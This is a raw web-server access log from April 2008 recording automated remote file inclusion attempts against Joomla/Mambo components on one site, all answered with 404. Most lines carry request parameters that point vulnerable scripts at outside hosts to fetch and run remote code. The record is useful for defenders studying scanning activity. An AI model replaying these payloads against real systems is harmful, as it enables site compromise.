213.235.247.137 - - [28/Apr/2008:06:53:51 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.235.247.137 - - [28/Apr/2008:06:53:51 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.235.247.137 - - [28/Apr/2008:06:53:52 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.216.189 - - [28/Apr/2008:06:53:54 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.216.189 - - [28/Apr/2008:06:53:55 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.75.216.189 - - [28/Apr/2008:06:53:55 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.59.192.33 - - [28/Apr/2008:06:54:17 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.59.192.33 - - [28/Apr/2008:06:54:17 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.59.192.33 - - [28/Apr/2008:06:54:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.106.46.92 - - [28/Apr/2008:06:54:46 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.46.92 - - [28/Apr/2008:06:54:46 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.46.92 - - [28/Apr/2008:06:54:46 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.48.33 - - [28/Apr/2008:06:55:18 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:55:54 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:55:54 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:55:54 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:55:54 -0700] "GET //index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:55:54 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.152.14 - - [28/Apr/2008:06:55:54 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
75.125.151.18 - - [28/Apr/2008:06:56:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://auctiontime.biz/uploaded/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
75.125.151.18 - - [28/Apr/2008:06:56:02 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://auctiontime.biz/uploaded/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.